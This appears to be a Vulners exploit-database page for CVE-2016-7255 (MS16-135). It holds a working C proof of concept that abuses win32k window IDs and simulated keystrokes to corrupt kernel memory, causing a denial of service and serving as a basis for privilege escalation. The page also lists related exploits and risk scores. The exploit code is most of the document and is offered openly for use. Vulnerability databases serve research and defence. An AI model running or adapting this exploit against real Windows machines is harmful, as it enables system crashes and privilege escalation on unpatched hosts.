Vulners
Lucene search
Microsoft Windows Kernel - 'win32k' Denial of Service (MS16-135)
| Reporter | Title | Published | Views | Family All 67 |
|---|---|---|---|---|
 | Exploit for CVE-2016-7255 | 2 Mar 201723:32 | – | githubexploit |
| Exploit for CVE-2019-0803 | 17 May 201911:05 | – | githubexploit |
| Exploit for CVE-2016-7255 | 13 Jan 201715:49 | – | githubexploit |
| Exploit for CVE-2016-7255 | 2 Mar 201723:32 | – | githubexploit |
 | Microsoft Windows Kernel - win32k Denial of Service (MS16-135) Exploit | 10 Nov 201600:00 | – | zdt |
| Microsoft Windows Kernel win32k.sys - 'NtSetWindowLongPtr' Privilege Escalation (MS16-13 | 24 Nov 201600:00 | – | zdt |
| Microsoft Windows Kernel - win32k.sys NtSetWindowLongPtr Privilege Escalation (MS16-135) (2) | 11 Jan 201700:00 | – | zdt |
| Microsoft Windows - Win32k Local Privilege Escalation Exploit | 24 May 201900:00 | – | zdt |
| Win32k ConsoleControl Offset Confusion / Privilege Escalation Exploit | 28 Feb 202200:00 | – | zdt |
 | CVE-2016-7255 | 10 Nov 201600:00 | – | attackerkb |
10
/*
Source: https://github.com/tinysec/public/tree/master/CVE-2016-7255
Full Proof of Concept:
https://github.com/tinysec/public/tree/master/CVE-2016-7255
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40745.zip
********************************************************************
Created: 2016-11-09 14:23:09
Filename: main.c
Author: root[at]TinySec.net
Version 0.0.0.1
Purpose: poc of cve-2016-0075
*********************************************************************
*/
#include <windows.h>
#include <wchar.h>
#include <stdlib.h>
#include <stdio.h>
//////////////////////////////////////////////////////////////////////////
#pragma comment(lib,"ntdll.lib")
#pragma comment(lib,"user32.lib")
#undef DbgPrint
ULONG __cdecl DbgPrintEx( IN ULONG ComponentId, IN ULONG Level, IN PCCH Format, IN ... );
ULONG __cdecl DbgPrint(__in char* Format, ...)
{
CHAR* pszDbgBuff = NULL;
va_list VaList=NULL;
ULONG ulRet = 0;
do
{
pszDbgBuff = (CHAR*)HeapAlloc(GetProcessHeap(), 0 ,1024 * sizeof(CHAR));
if (NULL == pszDbgBuff)
{
break;
}
RtlZeroMemory(pszDbgBuff,1024 * sizeof(CHAR));
va_start(VaList,Format);
_vsnprintf((CHAR*)pszDbgBuff,1024 - 1,Format,VaList);
DbgPrintEx(77 , 0 , pszDbgBuff );
OutputDebugStringA(pszDbgBuff);
va_end(VaList);
} while (FALSE);
if (NULL != pszDbgBuff)
{
HeapFree( GetProcessHeap(), 0 , pszDbgBuff );
pszDbgBuff = NULL;
}
return ulRet;
}
int _sim_key_down(WORD wKey)
{
INPUT stInput = {0};
do
{
stInput.type = INPUT_KEYBOARD;
stInput.ki.wVk = wKey;
stInput.ki.dwFlags = 0;
SendInput(1 , &stInput , sizeof(stInput) );
} while (FALSE);
return 0;
}
int _sim_key_up(WORD wKey)
{
INPUT stInput = {0};
do
{
stInput.type = INPUT_KEYBOARD;
stInput.ki.wVk = wKey;
stInput.ki.dwFlags = KEYEVENTF_KEYUP;
SendInput(1 , &stInput , sizeof(stInput) );
} while (FALSE);
return 0;
}
int _sim_alt_shift_esc()
{
int i = 0;
do
{
_sim_key_down( VK_MENU );
_sim_key_down( VK_SHIFT );
_sim_key_down( VK_ESCAPE);
_sim_key_up( VK_ESCAPE);
_sim_key_down( VK_ESCAPE);
_sim_key_up( VK_ESCAPE);
_sim_key_up( VK_MENU );
_sim_key_up( VK_SHIFT );
} while (FALSE);
return 0;
}
int _sim_alt_shift_tab(int nCount)
{
int i = 0;
HWND hWnd = NULL;
int nFinalRet = -1;
do
{
_sim_key_down( VK_MENU );
_sim_key_down( VK_SHIFT );
for ( i = 0; i < nCount ; i++)
{
_sim_key_down( VK_TAB);
_sim_key_up( VK_TAB);
Sleep(1000);
}
_sim_key_up( VK_MENU );
_sim_key_up( VK_SHIFT );
} while (FALSE);
return nFinalRet;
}
int or_address_value_4(__in void* pAddress)
{
WNDCLASSEXW stWC = {0};
HWND hWndParent = NULL;
HWND hWndChild = NULL;
WCHAR* pszClassName = L"cve-2016-7255";
WCHAR* pszTitleName = L"cve-2016-7255";
void* pId = NULL;
MSG stMsg = {0};
do
{
stWC.cbSize = sizeof(stWC);
stWC.lpfnWndProc = DefWindowProcW;
stWC.lpszClassName = pszClassName;
if ( 0 == RegisterClassExW(&stWC) )
{
break;
}
hWndParent = CreateWindowExW(
0,
pszClassName,
NULL,
WS_OVERLAPPEDWINDOW|WS_VISIBLE,
0,
0,
360,
360,
NULL,
NULL,
GetModuleHandleW(NULL),
NULL
);
if (NULL == hWndParent)
{
break;
}
hWndChild = CreateWindowExW(
0,
pszClassName,
pszTitleName,
WS_OVERLAPPEDWINDOW|WS_VISIBLE|WS_CHILD,
0,
0,
160,
160,
hWndParent,
NULL,
GetModuleHandleW(NULL),
NULL
);
if (NULL == hWndChild)
{
break;
}
#ifdef _WIN64
pId = ( (UCHAR*)pAddress - 0x28 );
#else
pId = ( (UCHAR*)pAddress - 0x14);
#endif // #ifdef _WIN64
SetWindowLongPtr(hWndChild , GWLP_ID , (LONG_PTR)pId );
DbgPrint("hWndChild = 0x%p\n" , hWndChild);
DebugBreak();
ShowWindow(hWndParent , SW_SHOWNORMAL);
SetParent(hWndChild , GetDesktopWindow() );
SetForegroundWindow(hWndChild);
_sim_alt_shift_tab(4);
SwitchToThisWindow(hWndChild , TRUE);
_sim_alt_shift_esc();
while( GetMessage(&stMsg , NULL , 0 , 0) )
{
TranslateMessage(&stMsg);
DispatchMessage(&stMsg);
}
} while (FALSE);
if ( NULL != hWndParent )
{
DestroyWindow(hWndParent);
hWndParent = NULL;
}
if ( NULL != hWndChild )
{
DestroyWindow(hWndChild);
hWndChild = NULL;
}
UnregisterClassW(pszClassName , GetModuleHandleW(NULL) );
return 0;
}
int __cdecl wmain(int nArgc, WCHAR** Argv)
{
do
{
or_address_value_4( (void*)0xFFFFFFFF );
} while (FALSE);
return 0;
}Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
09 Nov 2016 00:00Current
7High risk
Vulners AI Score7
CVSS 27.2
CVSS 3.17.8
EPSS0.89561
SSVC